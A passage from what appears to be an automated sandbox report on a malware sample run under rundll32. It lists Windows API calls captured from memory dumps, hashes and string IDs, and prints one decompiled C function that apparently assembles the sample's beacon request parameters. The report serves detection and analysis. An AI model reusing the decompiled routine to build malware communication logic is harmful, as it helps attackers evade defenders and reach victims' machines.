                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 05581BA8
                                                          • lstrcat.KERNEL32(00000000,?), ref: 05581BB3
                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 05581BB7
                                                          • HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?,?,00000000), ref: 05581C38
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 05581C47
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,059BB188), ref: 05581C56
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 05581C68
                                                          • HeapFree.KERNEL32(00000000,?), ref: 05581C7A
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heapwsprintf$Free$lstrcat$AllocateCountCriticalPerformanceQuerySectionTick$CounterEnterFrequencyLeaveTrim_aulldivlstrcpy
                                                          • String ID:
                                                          • API String ID: 2878544442-0
                                                          • Opcode ID: d85477b50f7aeb57ffa2497d5c1432e15e888834737add741f0659caf94eac32
                                                          • Instruction ID: a95895d32a0502f62c7870b3698e797eb22ee0cccebde42299a489c0b929bead
                                                          • Opcode Fuzzy Hash: d85477b50f7aeb57ffa2497d5c1432e15e888834737add741f0659caf94eac32
                                                          • Instruction Fuzzy Hash: 8CA15A71614206EFDB01DFA9EC8AE6A7BE8FB48214F064416F548D7250DB38E819EB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(?,00000000,?,?), ref: 05582B4A
                                                          • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 05582BE6
                                                          • lstrcpyn.KERNEL32(00000000,?,?), ref: 05582BFB
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 05582C16
                                                          • StrChrA.SHLWAPI(?,00000020,?,00000000,00000000,?,00000000,?,?,?), ref: 05582D00
                                                          • StrChrA.SHLWAPI(00000001,00000020), ref: 05582D11
                                                          • lstrlen.KERNEL32(00000000), ref: 05582D25
                                                          • memmove.NTDLL(?,?,00000001), ref: 05582D35
                                                          • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 05582D61
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05582D87
                                                          • memcpy.NTDLL(00000000,?,?), ref: 05582D9B
                                                          • memcpy.NTDLL(?,?,?), ref: 05582DBB
                                                          • HeapFree.KERNEL32(00000000,?), ref: 05582DF7
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05582EBD
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 05582F05
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocateFreelstrlen$memcpy$lstrcpynmemmove
                                                          • String ID: GET $GET $OPTI$OPTI$POST$PUT
                                                          • API String ID: 3227826163-647159250
                                                          • Opcode ID: 1eb73a44b733b2f448e5c0d7a17e5e704758d14010d7c255c360d85902777aff
                                                          • Instruction ID: b789c0ce4ceb29ced5585faca7d7e8ca0a6dc692b9d423dcec811fd1dcf73403
                                                          • Opcode Fuzzy Hash: 1eb73a44b733b2f448e5c0d7a17e5e704758d14010d7c255c360d85902777aff
                                                          • Instruction Fuzzy Hash: 3EE18A75A00206EFDB14EFA8C889BBA7FB9FF04310F144559F816AB290DB34E955DB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL ref: 05574CAD
                                                          • wsprintfA.USER32 ref: 05574D12
                                                          • wsprintfA.USER32 ref: 05574D58
                                                          • wsprintfA.USER32 ref: 05574D79
                                                          • lstrcat.KERNEL32(00000000,?), ref: 05574DB0
                                                          • wsprintfA.USER32 ref: 05574DCC
                                                          • wsprintfA.USER32 ref: 05574DE2
                                                          • wsprintfA.USER32 ref: 05574E02
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 05574E1F
                                                          • RtlEnterCriticalSection.NTDLL(059BB148), ref: 05574E40
                                                          • RtlLeaveCriticalSection.NTDLL(059BB148), ref: 05574E5A
                                                            • Part of subcall function 055756B8: lstrlen.KERNEL32(00000000,751881D0,?,00000000,00000000,?,?,05581B69,00000000,059BB188), ref: 055756E3
                                                            • Part of subcall function 055756B8: lstrlen.KERNEL32(?,?,?,05581B69,00000000,059BB188), ref: 055756EB
                                                            • Part of subcall function 055756B8: strcpy.NTDLL ref: 05575702
                                                            • Part of subcall function 055756B8: lstrcat.KERNEL32(00000000,?), ref: 0557570D
                                                            • Part of subcall function 055756B8: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,05581B69,00000000,059BB188), ref: 0557572A
                                                          • StrTrimA.SHLWAPI(00000000,055963D8,00000000,059BB188), ref: 05574E8C
                                                            • Part of subcall function 05575995: lstrlen.KERNEL32(059B9986,00000000,751881D0,00000000,05581B94,00000000), ref: 055759A5
                                                            • Part of subcall function 05575995: lstrlen.KERNEL32(?), ref: 055759AD
                                                            • Part of subcall function 05575995: lstrcpy.KERNEL32(00000000,059B9986), ref: 055759C1
                                                            • Part of subcall function 05575995: lstrcat.KERNEL32(00000000,?), ref: 055759CC
                                                          • lstrcpy.KERNEL32(?,00000000), ref: 05574EB0
                                                          • lstrcat.KERNEL32(?,?), ref: 05574EBE
                                                          • lstrcat.KERNEL32(?,00000000), ref: 05574EC5
                                                          • RtlEnterCriticalSection.NTDLL(059BB148), ref: 05574ED0
                                                          • RtlLeaveCriticalSection.NTDLL(059BB148), ref: 05574EEC
                                                            • Part of subcall function 05590190: memcpy.NTDLL(?,?,00000010), ref: 055901E1
                                                            • Part of subcall function 05590190: memcpy.NTDLL(00000000,?,?,00000010), ref: 05590274
                                                          • HeapFree.KERNEL32(00000000,?,00000001,059BB188,?,?,?), ref: 05574FBA
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 05574FC9
                                                          • HeapFree.KERNEL32(00000000,?,00000000,059BB188), ref: 05574FDB
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 05574FED
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 05574FFC
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$wsprintf$Freelstrcat$CriticalSectionlstrlen$AllocateEnterLeaveTrimlstrcpymemcpy$strcpy
                                                          • String ID:
                                                          • API String ID: 2173832509-0
                                                          • Opcode ID: bb936e034dbcedca71da2399aa43453ce2197faebc28e6902bb73bae7ad888d7
                                                          • Instruction ID: da802a534590c89272176a4e9b7d63139bfcdec94895d4fbb78bd0429c132dd8
                                                          • Opcode Fuzzy Hash: bb936e034dbcedca71da2399aa43453ce2197faebc28e6902bb73bae7ad888d7
                                                          • Instruction Fuzzy Hash: 46A1BF71518209EFDB01DFA8EC86E1ABBE8FB88314F064516F559D7260DB38E908EF51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 77%
                                                          			E00E5254C(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, signed int _a20) {
                                                          				void* _v8;
                                                          				void* _v12;
                                                          				void* _v16;
                                                          				void* _v20;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				long _t63;
                                                          				intOrPtr _t64;
                                                          				intOrPtr _t65;
                                                          				intOrPtr _t66;
                                                          				intOrPtr _t67;
                                                          				intOrPtr _t68;
                                                          				void* _t71;
                                                          				intOrPtr _t72;
                                                          				int _t75;
                                                          				void* _t76;
                                                          				intOrPtr _t77;
                                                          				intOrPtr _t81;
                                                          				intOrPtr _t85;
                                                          				intOrPtr _t86;
                                                          				void* _t88;
                                                          				void* _t91;
                                                          				intOrPtr _t95;
                                                          				intOrPtr _t99;
                                                          				intOrPtr* _t101;
                                                          				void* _t107;
                                                          				intOrPtr _t111;
                                                          				signed int _t115;
                                                          				char** _t117;
                                                          				int _t120;
                                                          				intOrPtr* _t123;
                                                          				intOrPtr* _t125;
                                                          				intOrPtr* _t127;
                                                          				intOrPtr* _t129;
                                                          				intOrPtr _t132;
                                                          				intOrPtr _t135;
                                                          				int _t138;
                                                          				intOrPtr _t139;
                                                          				int _t142;
                                                          				void* _t143;
                                                          				void* _t144;
                                                          				void* _t154;
                                                          				int _t157;
                                                          				void* _t158;
                                                          				void* _t159;
                                                          				void* _t160;
                                                          				intOrPtr _t161;
                                                          				void* _t163;
                                                          				long _t167;
                                                          				intOrPtr* _t168;
                                                          				intOrPtr* _t171;
                                                          				void* _t172;
                                                          				void* _t174;
                                                          				void* _t175;
                                                          				void* _t180;
                                                          
                                                          				_t154 = __edx;
                                                          				_t144 = __ecx;
                                                          				_t63 = __eax;
                                                          				_t143 = _a20;
                                                          				_a20 = 8;
                                                          				if(__eax == 0) {
                                                          					_t63 = GetTickCount();
                                                          				}
                                                          				_t64 =  *0xe5a018; // 0x94cfb54a
                                                          				asm("bswap eax");
                                                          				_t65 =  *0xe5a014; // 0x5cb11ae7
                                                          				asm("bswap eax");
                                                          				_t66 =  *0xe5a010; // 0x15dc9586
                                                          				asm("bswap eax");
                                                          				_t67 =  *0xe5a00c; // 0x69ab8210
                                                          				asm("bswap eax");
                                                          				_t68 =  *0xe5a2d4; // 0x435d5a8
                                                          				_t3 = _t68 + 0xe5b622; // 0x74666f73
                                                          				_t157 = wsprintfA(_t143, _t3, 3, 0x3d163, _t67, _t66, _t65, _t64,  *0xe5a02c,  *0xe5a004, _t63);
                                                          				_t71 = E00E56A9F();
                                                          				_t72 =  *0xe5a2d4; // 0x435d5a8
                                                          				_t4 = _t72 + 0xe5b662; // 0x74707526
                                                          				_t75 = wsprintfA(_t157 + _t143, _t4, _t71);
                                                          				_t174 = _t172 + 0x38;
                                                          				_t158 = _t157 + _t75;
                                                          				if(_a8 != 0) {
                                                          					_t139 =  *0xe5a2d4; // 0x435d5a8
                                                          					_t8 = _t139 + 0xe5b66d; // 0x732526
                                                          					_t142 = wsprintfA(_t158 + _t143, _t8, _a8);
                                                          					_t174 = _t174 + 0xc;
                                                          					_t158 = _t158 + _t142;
                                                          				}
                                                          				_t76 = E00E52C60(_t144);
                                                          				_t77 =  *0xe5a2d4; // 0x435d5a8
                                                          				_t10 = _t77 + 0xe5b38a; // 0x6d697426
                                                          				_t159 = _t158 + wsprintfA(_t158 + _t143, _t10, _t76, _t154);
                                                          				_t81 =  *0xe5a2d4; // 0x435d5a8
                                                          				_t12 = _t81 + 0xe5b7b4; // 0x51b8d5c
                                                          				_t180 = _a4 - _t12;
                                                          				_t14 = _t81 + 0xe5b33b; // 0x74636126
                                                          				_t156 = 0 | _t180 == 0x00000000;
                                                          				_t160 = _t159 + wsprintfA(_t159 + _t143, _t14, _t180 == 0);
                                                          				_t85 =  *0xe5a31c; // 0x51b95e0
                                                          				_t175 = _t174 + 0x1c;
                                                          				if(_t85 != 0) {
                                                          					_t135 =  *0xe5a2d4; // 0x435d5a8
                                                          					_t18 = _t135 + 0xe5b8e9; // 0x3d736f26
                                                          					_t138 = wsprintfA(_t160 + _t143, _t18, _t85);
                                                          					_t175 = _t175 + 0xc;
                                                          					_t160 = _t160 + _t138;
                                                          				}
                                                          				_t86 =  *0xe5a32c; // 0x51b95b0
                                                          				if(_t86 != 0) {
                                                          					_t132 =  *0xe5a2d4; // 0x435d5a8
                                                          					_t20 = _t132 + 0xe5b685; // 0x73797326
                                                          					wsprintfA(_t160 + _t143, _t20, _t86);
                                                          					_t175 = _t175 + 0xc;
                                                          				}
                                                          				_t161 =  *0xe5a37c; // 0x51b9630
                                                          				_t88 = E00E53A66(0xe5a00a, _t161 + 4);
                                                          				_t167 = 0;
                                                          				_v12 = _t88;
                                                          				if(_t88 == 0) {
                                                          					L28:
                                                          					HeapFree( *0xe5a290, _t167, _t143);
                                                          					return _a20;
                                                          				} else {
                                                          					_t91 = RtlAllocateHeap( *0xe5a290, 0, 0x800);
                                                          					_a8 = _t91;
                                                          					if(_t91 == 0) {
                                                          						L27:
                                                          						HeapFree( *0xe5a290, _t167, _v12);
                                                          						goto L28;
                                                          					}
                                                          					E00E52C46(GetTickCount());
                                                          					_t95 =  *0xe5a37c; // 0x51b9630
                                                          					__imp__(_t95 + 0x40);
                                                          					asm("lock xadd [eax], ecx");
                                                          					_t99 =  *0xe5a37c; // 0x51b9630
                                                          					__imp__(_t99 + 0x40);
                                                          					_t101 =  *0xe5a37c; // 0x51b9630
                                                          					_t163 = E00E57156(1, _t156, _t143,  *_t101);
                                                          					_v20 = _t163;
                                                          					asm("lock xadd [eax], ecx");
                                                          					if(_t163 == 0) {
                                                          						L26:
                                                          						HeapFree( *0xe5a290, _t167, _a8);
                                                          						goto L27;
                                                          					}
                                                          					StrTrimA(_t163, 0xe592ac);
                                                          					_push(_t163);
                                                          					_t107 = E00E55C8D();
                                                          					_v8 = _t107;
                                                          					if(_t107 == 0) {
                                                          						L25:
                                                          						HeapFree( *0xe5a290, _t167, _t163);
                                                          						goto L26;
                                                          					}
                                                          					 *_t163 = 0;
                                                          					__imp__(_a8, _v12);
                                                          					_t168 = __imp__;
                                                          					 *_t168(_a8, _v8);
                                                          					_t111 = E00E53FC1( *_t168(_a8, _t163), _a8);
                                                          					_a4 = _t111;
                                                          					if(_t111 == 0) {
                                                          						_a20 = 8;
                                                          						L23:
                                                          						E00E53546();
                                                          						L24:
                                                          						HeapFree( *0xe5a290, 0, _v8);
                                                          						_t167 = 0;
                                                          						goto L25;
                                                          					}
                                                          					_t115 = E00E558A0(_t143, 0xffffffffffffffff, _t163,  &_v16);
                                                          					_a20 = _t115;
                                                          					if(_t115 == 0) {
                                                          						_t171 = _v16;
                                                          						_a20 = E00E5627E(_t171, _a4, _a12, _a16);
                                                          						_t123 =  *((intOrPtr*)(_t171 + 8));
                                                          						 *((intOrPtr*)( *_t123 + 0x80))(_t123);
                                                          						_t125 =  *((intOrPtr*)(_t171 + 8));
                                                          						 *((intOrPtr*)( *_t125 + 8))(_t125);
                                                          						_t127 =  *((intOrPtr*)(_t171 + 4));
                                                          						 *((intOrPtr*)( *_t127 + 8))(_t127);
                                                          						_t129 =  *_t171;
                                                          						 *((intOrPtr*)( *_t129 + 8))(_t129);
                                                          						E00E513CC(_t171);
                                                          					}
                                                          					if(_a20 != 0x10d2) {
                                                          						L18:
                                                          						if(_a20 == 0) {
                                                          							_t117 = _a12;
                                                          							if(_t117 != 0) {
                                                          								_t164 =  *_t117;
                                                          								_t169 =  *_a16;
                                                          								wcstombs( *_t117,  *_t117,  *_a16);
                                                          								_t120 = E00E537F6(_t164, _t164, _t169 >> 1);
                                                          								_t163 = _v20;
                                                          								 *_a16 = _t120;
                                                          							}
                                                          						}
                                                          						goto L21;
                                                          					} else {
                                                          						if(_a12 != 0) {
                                                          							L21:
                                                          							E00E513CC(_a4);
                                                          							if(_a20 == 0 || _a20 == 0x10d2) {
                                                          								goto L24;
                                                          							} else {
                                                          								goto L23;
                                                          							}
                                                          						}
                                                          						_a20 = _a20 & 0x00000000;
                                                          						goto L18;
                                                          					}
                                                          				}
                                                          			}


                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00E52563
                                                          • wsprintfA.USER32 ref: 00E525B0
                                                          • wsprintfA.USER32 ref: 00E525CD
                                                          • wsprintfA.USER32 ref: 00E525ED
                                                          • wsprintfA.USER32 ref: 00E5260B
                                                          • wsprintfA.USER32 ref: 00E5262E
                                                          • wsprintfA.USER32 ref: 00E5264F
                                                          • wsprintfA.USER32 ref: 00E5266F
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00E526A0
                                                          • GetTickCount.KERNEL32 ref: 00E526B1
                                                          • RtlEnterCriticalSection.NTDLL(051B95F0), ref: 00E526C5
                                                          • RtlLeaveCriticalSection.NTDLL(051B95F0), ref: 00E526E3
                                                            • Part of subcall function 00E57156: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,00E54A9F,00000000,051B9630), ref: 00E57181
                                                            • Part of subcall function 00E57156: lstrlen.KERNEL32(00000000,?,00000000,00E54A9F,00000000,051B9630), ref: 00E57189
                                                            • Part of subcall function 00E57156: strcpy.NTDLL ref: 00E571A0
                                                            • Part of subcall function 00E57156: lstrcat.KERNEL32(00000000,00000000), ref: 00E571AB
                                                            • Part of subcall function 00E57156: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00E54A9F,?,00000000,00E54A9F,00000000,051B9630), ref: 00E571C8
                                                          • StrTrimA.SHLWAPI(00000000,00E592AC,?,051B9630), ref: 00E52718
                                                            • Part of subcall function 00E55C8D: lstrlen.KERNEL32(051B887A,00000000,00000000,00000000,00E54AC6,00000000), ref: 00E55C9D
                                                            • Part of subcall function 00E55C8D: lstrlen.KERNEL32(?), ref: 00E55CA5
                                                            • Part of subcall function 00E55C8D: lstrcpy.KERNEL32(00000000,051B887A), ref: 00E55CB9
                                                            • Part of subcall function 00E55C8D: lstrcat.KERNEL32(00000000,?), ref: 00E55CC4
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 00E52738
                                                          • lstrcat.KERNEL32(00000000,?), ref: 00E5274A
                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 00E52750
                                                            • Part of subcall function 00E53FC1: lstrlen.KERNEL32(?,00000000,051B9CD0,74ECC740,00E535B6,051B9ED5,?,KE,?,KE,?,69B25F44,E8FA7DD7,00000000), ref: 00E53FC8
                                                            • Part of subcall function 00E53FC1: mbstowcs.NTDLL ref: 00E53FF1
                                                            • Part of subcall function 00E53FC1: memset.NTDLL ref: 00E54003
                                                          • wcstombs.NTDLL ref: 00E527E1
                                                            • Part of subcall function 00E5627E: SysAllocString.OLEAUT32(00000000), ref: 00E562BF
                                                            • Part of subcall function 00E513CC: RtlFreeHeap.NTDLL(00000000,00000000,00E520F3,00000000,00000000,?,00000000,?,?,?,?,?,00E568A9,00000000,?,00000001), ref: 00E513D8
                                                          • HeapFree.KERNEL32(00000000,?,00000000), ref: 00E52822
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00E52832
                                                          • HeapFree.KERNEL32(00000000,00000000,?,051B9630), ref: 00E52842
                                                          • HeapFree.KERNEL32(00000000,?), ref: 00E52852
                                                          • HeapFree.KERNEL32(00000000,?), ref: 00E52860
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heapwsprintf$Free$lstrlen$lstrcat$CountCriticalSectionTickTrimlstrcpy$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                                          • String ID:
                                                          • API String ID: 972889839-0
                                                          • Opcode ID: e1775794176943d5456a7f1d4c9e1545ec04d9b9a53ff24f53006d4bd0cbc4cb
                                                          • Instruction ID: 509e7b64d7c749a66dc250e9a240490833cf864521a45440359d6da8d41a31ac
                                                          • Opcode Fuzzy Hash: e1775794176943d5456a7f1d4c9e1545ec04d9b9a53ff24f53006d4bd0cbc4cb
                                                          • Instruction Fuzzy Hash: FDA18C71500209EFCB15DFA9DC89E9A3BE8FF09316F184925F908E7261D7319918DBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlenW.KERNEL32(?), ref: 0558255B
                                                            • Part of subcall function 055714A0: lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,77A31120), ref: 055714EC
                                                            • Part of subcall function 055714A0: lstrlenW.KERNEL32(?,?,77A31120), ref: 055714F8
                                                            • Part of subcall function 055714A0: memset.NTDLL ref: 05571540
                                                            • Part of subcall function 055714A0: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0557155B
                                                            • Part of subcall function 055714A0: lstrlenW.KERNEL32(0000002C), ref: 05571593
                                                            • Part of subcall function 055714A0: lstrlenW.KERNEL32(?), ref: 0557159B
                                                            • Part of subcall function 055714A0: memset.NTDLL ref: 055715BE
                                                            • Part of subcall function 055714A0: wcscpy.NTDLL ref: 055715D0
                                                            • Part of subcall function 055714A0: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 055715F6
                                                            • Part of subcall function 055714A0: RtlEnterCriticalSection.NTDLL(?), ref: 0557162B
                                                            • Part of subcall function 055714A0: RtlLeaveCriticalSection.NTDLL(?), ref: 05571647
                                                            • Part of subcall function 055714A0: FindNextFileW.KERNEL32(?,00000000), ref: 05571660
                                                            • Part of subcall function 055714A0: WaitForSingleObject.KERNEL32(00000000), ref: 05571672
                                                            • Part of subcall function 055714A0: FindClose.KERNEL32(?), ref: 05571687
                                                            • Part of subcall function 055714A0: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0557169B
                                                            • Part of subcall function 055714A0: lstrlenW.KERNEL32(0000002C), ref: 055716BD
                                                          • RtlAllocateHeap.NTDLL(00000000,00000036,?), ref: 055825B7
                                                          • memcpy.NTDLL(00000000,?,00000000), ref: 055825CA
                                                          • lstrcpyW.KERNEL32(00000000,?), ref: 055825E1
                                                            • Part of subcall function 055714A0: FindNextFileW.KERNEL32(?,00000000), ref: 05571733
                                                            • Part of subcall function 055714A0: WaitForSingleObject.KERNEL32(00000000), ref: 05571745
                                                            • Part of subcall function 055714A0: FindClose.KERNEL32(?), ref: 05571760
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000010), ref: 0558260C
                                                          • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 05582624
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0558267E
                                                          • lstrlenW.KERNEL32(00000000,?), ref: 055826A1
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 055826B3
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000014), ref: 05582727
                                                          • HeapFree.KERNEL32(00000000,?), ref: 05582737
                                                            • Part of subcall function 0558F274: lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,0558974F,00000000,00000000,00000000,05593D7C,00000000,00000000,00000006), ref: 0558F283
                                                            • Part of subcall function 0558F274: mbstowcs.NTDLL ref: 0558F29F
                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,?), ref: 05582760
                                                          • lstrlenW.KERNEL32(0559D8B0,?), ref: 055827DA
                                                          • DeleteFileW.KERNEL32(?,?), ref: 05582808
                                                          • HeapFree.KERNEL32(00000000,?), ref: 05582816
                                                          • HeapFree.KERNEL32(00000000,?), ref: 05582837
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heaplstrlen$Find$FileFree$Allocate$CloseCriticalFirstNextObjectSectionSingleWaitmemset$CreateDeleteDirectoryEnterLeaveNamePathlstrcpymbstowcsmemcpywcscpy
                                                          • String ID:
                                                          • API String ID: 72361108-0

                                                          APIs
                                                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 05592CAF
                                                          • RtlEnterCriticalSection.NTDLL(00000000), ref: 05592CCC
                                                          • CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 05592D1C
                                                          • DeleteFileW.KERNEL32(00000000,?,?,?,00000000), ref: 05592D26
                                                          • GetLastError.KERNEL32 ref: 05592D30
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 05592D41
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 05592D63
                                                          • HeapFree.KERNEL32(00000000,?), ref: 05592D9A
                                                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 05592DAE
                                                          • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 05592DB7
                                                          • SuspendThread.KERNEL32(?), ref: 05592DC6
                                                          • CreateEventA.KERNEL32(0559C1A8,00000001,00000000), ref: 05592DDA
                                                          • SetEvent.KERNEL32(00000000), ref: 05592DE7
                                                          • CloseHandle.KERNEL32(00000000), ref: 05592DEE
                                                          • Sleep.KERNEL32(000001F4), ref: 05592E01
                                                          • ResumeThread.KERNEL32(?), ref: 05592E25
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CloseFreeHeap$CriticalEventHandleSectionThread$CreateDeleteEnterErrorFileLastLeaveOpenResumeSleepSuspend
                                                          • String ID:
                                                          • API String ID: 1011176505-0

                                                          APIs
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • memset.NTDLL ref: 0558F5DC
                                                          • StrChrA.SHLWAPI(?,0000000D), ref: 0558F622
                                                          • StrChrA.SHLWAPI(?,0000000A), ref: 0558F62F
                                                          • StrChrA.SHLWAPI(?,0000007C), ref: 0558F656
                                                          • StrTrimA.SHLWAPI(?,0559847C), ref: 0558F66B
                                                          • StrChrA.SHLWAPI(?,0000003D), ref: 0558F674
                                                          • StrTrimA.SHLWAPI(00000001,0559847C), ref: 0558F68A
                                                          • _strupr.NTDLL ref: 0558F691
                                                          • StrTrimA.SHLWAPI(?,?), ref: 0558F69E
                                                          • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 0558F6E6
                                                          • lstrlen.KERNEL32(?,00000000,?,?,?,00000001,?,00000000,?), ref: 0558F705
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Trim$AllocateHeap_struprlstrlenmemcpymemset
                                                          • String ID: $;
                                                          • API String ID: 4019332941-73438061

                                                          APIs
                                                          • memset.NTDLL ref: 05586CBB
                                                            • Part of subcall function 0558F274: lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,0558974F,00000000,00000000,00000000,05593D7C,00000000,00000000,00000006), ref: 0558F283
                                                            • Part of subcall function 0558F274: mbstowcs.NTDLL ref: 0558F29F
                                                          • lstrlenW.KERNEL32(00000000,00000000,00000000,77A2DBB0,00000020,00000000), ref: 05586CF4
                                                          • wcstombs.NTDLL ref: 05586CFE
                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,77A2DBB0,00000020,00000000), ref: 05586D2F
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0557DDD2), ref: 05586D5B
                                                          • TerminateProcess.KERNEL32(?,000003E5), ref: 05586D71
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0557DDD2), ref: 05586D85
                                                          • GetLastError.KERNEL32 ref: 05586D89
                                                          • GetExitCodeProcess.KERNEL32(?,00000001), ref: 05586DA9
                                                          • CloseHandle.KERNEL32(?), ref: 05586DB8
                                                          • CloseHandle.KERNEL32(?), ref: 05586DBD
                                                          • GetLastError.KERNEL32 ref: 05586DC1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Process$CloseErrorHandleLastMultipleObjectsWaitlstrlen$CodeCreateExitTerminatembstowcsmemsetwcstombs
                                                          • String ID: D
                                                          • API String ID: 2463014471-2746444292

                                                          APIs
                                                            • Part of subcall function 055750C7: RegQueryValueExA.KERNEL32(00000000,055729E6,00000000,055729E6,00000000,?,?,00000000,00000000,?,?,055729E6,055729E6,?,05588593,?), ref: 055750FF
                                                            • Part of subcall function 055750C7: RtlAllocateHeap.NTDLL(00000000,?), ref: 05575113
                                                            • Part of subcall function 055750C7: RegQueryValueExA.ADVAPI32(00000000,055729E6,00000000,055729E6,00000000,?,?,00000000,00000000,?,?,055729E6,055729E6,?,05588593,?), ref: 0557512D
                                                            • Part of subcall function 055750C7: RegCloseKey.ADVAPI32(00000000,?,00000000,00000000,?,?,055729E6,055729E6,?,05588593,?,055729E6,00000000), ref: 05575157
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?), ref: 05578CE4
                                                          • RtlAllocateHeap.NTDLL(00000000,00010000,?), ref: 05578D02
                                                          • HeapFree.KERNEL32(00000000,00000000,00000029,00000000,00000000,?), ref: 05578D30
                                                          • HeapFree.KERNEL32(00000000,055963D8,0000002A,00000000,00000000,00000000,00000000,?,00000001,055963D8,00000002,?,?), ref: 05578DA4
